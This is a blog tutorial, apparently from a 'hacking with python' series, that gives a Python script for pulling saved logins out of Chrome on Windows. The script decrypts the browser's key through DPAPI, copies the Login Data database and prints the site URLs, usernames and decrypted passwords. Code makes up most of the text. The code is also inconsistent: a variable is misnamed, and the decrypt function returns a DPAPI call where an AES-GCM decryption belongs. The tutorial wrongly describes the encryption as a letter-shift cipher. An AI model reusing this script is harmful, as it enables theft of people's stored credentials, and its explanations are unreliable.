Feb 24, 2021
How to extract Chrome Passwords using python/python3!
Hello everyone and welcome to another tutorial!
This is the 5th video from hacking with python series, in this episode we are going to take a look at how to make your own script that extracts chrome passwords and some details about each password.
So we are going to start off with installing some modules using pip.
pip3 install pycryptodome pypiwin32
Alright now open up your terminal and start off by typing pip install pypiwin32 crypto and hit enter.
Ok now that we have everything set up correctly let’s dive into some code!
Let's start off by importing the necessary modules!
After importing all the dependencies we need to create some functions.
Let's start by creating a function that takes as a parameter a date as chromedate format and
returns a date that is readable by humans.
def get_chrome_datetime(chromedate): return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)
Ok now we need a function that opens the file where every password is stored
Gets the encryption key so to do this we need to decode it and we will need base64 to do this.
Then remove the DPAPI string
def get_encryption_key(): local_state_path = os.path.join(os.environ[“USERPROFILE”], “AppData”, “Local”, “Google”, “Chrome”, “User Data”, “Local State”) with open(local_state_path, “r”, encoding=”utf-8") as f: local_state = f.read() local_state = json.loads(local_state) # decode the encryption key from Base64 gkey = base64.b64decode(local_state[“os_crypt”] [“encrypted_key”])
# remove DPAPI str key = key[5:] return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
# return decrypted key that was originally encrypted
# using a session key derived from the current user’s login credentials
Ok let me now explain what this encryption key basically is:
So the passwords are stored and encrypted using the cipher encryption technique, which basically goes like this.
Let's say you want to encrypt the message:
Hello
What you would do is go and shift every letter by some number which is called an encryption key.
So let's set en_key to 1, then
- H becomes I
- E becomes F
- L becomes M
And so on, so we need to get the encryption key for our files before decrypting the passwords.
Now we need to find all passwords stored and return them as a string readable by humans so we need to actually decrypt them before returning them.
def decrypt_password(password, key):
iv = password[3:15] password = password[15:]
cipher = AES.new(key, AES.MODE_GCM, iv)
return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])To do this we need to get the initialization vector, lets go ahead and do this by typing ….
This is something you don’t need to worry about as it is something you will do by default.
Ok now with this info we can generate what’s called a cipher, this is basically something the alphabet shifted by the en_key for the decrypt function.
Alright now we will finally return cipher.decrypt(password)[:-16].decode()
In case this returns you an error, this is because you need to be in windows to do this.
And last but not least we need to have a main function that will use all of those functions we just created!
def main(): key = get_encryption_key() //Ok now we need the en_key so lets store this in a key variable db_path = os.path.join(os.environ[“USERPROFILE”], “AppData”, “Local”, “Google”, “Chrome”, “User Data”, “default”, “Login Data” filename = “ChromeData.db” shutil.copyfile(db_path, filename)
Let's store the path to the db and copy the file to another location because the database will be locked if chrome is currently running.
# connect to the database
db = sqlite3.connect(filename)cursor = db.cursor()
Now we need to connect using this filename
And create what is called a cursor that will help us jump around the database.
# `logins` table has the data we need
cursor.execute(“select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created”)So, quick reminder databases have rows and columns with different information stored in each one of them, now we need to say to our program hey I want only some rows and columns that have in them stored the login information we need!
Alright, now that we have everything set up let's go through this table this is how it is called, and let's grab some info we need. This is also called iterate, just good to keep in mind.
for row in cursor.fetchall(): origin_url = row[0] action_url = row[1] username = row[2] password = decrypt_password(row[3], key) date_created = row[4] date_last_used = row[5]
Ok so we want it from the row in index 0, but remember that we put 0 because we start from 0 in programming and those rows have the information we want to be stored in them!
The password will have to be decrypted with the function we made.
if username or password: print(f”Origin URL: {origin_url}”) print(f”Action URL: {action_url}”) print(f”Username: {username}”) print(f”Password: {password}”)else: continue
Ok, let's check if there is any information stored in chrome otherwise we cant print anything.
if date_created != 86400000000 and date_created: print(f”Creation date: {str(get_chrome_datetime(date_created))}”) if date_last_used != 86400000000 and date_last_used: print(f”Last Used: {str(get_chrome_datetime(date_last_used))}”) print(“=”*50)
And in the same way, let's provide some more information!
cursor.close()db.close()
Then we need to actually close the cursor and the db, just what we would do in every file.
try: # try to remove the copied db file os.remove(filename)except: pass
And lastly, let's remove the copied file so we don’t mess up with our space!
I hope you enjoyed the tutorial and if you did make sure to upvote my tutorial and check out the great resources our community provides!
Full code here: https://github.com/SpyrosD3v25/Extract-Chrome-Passwords/blob/main/extract.py
Discord: https://discord.gg/ButwDC6H (We have a channel with around 100 links and pdfs for cybersecurity, that covers almost every aspect of cybersecurity and programming in general)
Youtube: https://www.youtube.com/watch?v=r3G5U3t1IDI A series with lots of videos about hacking with python3!
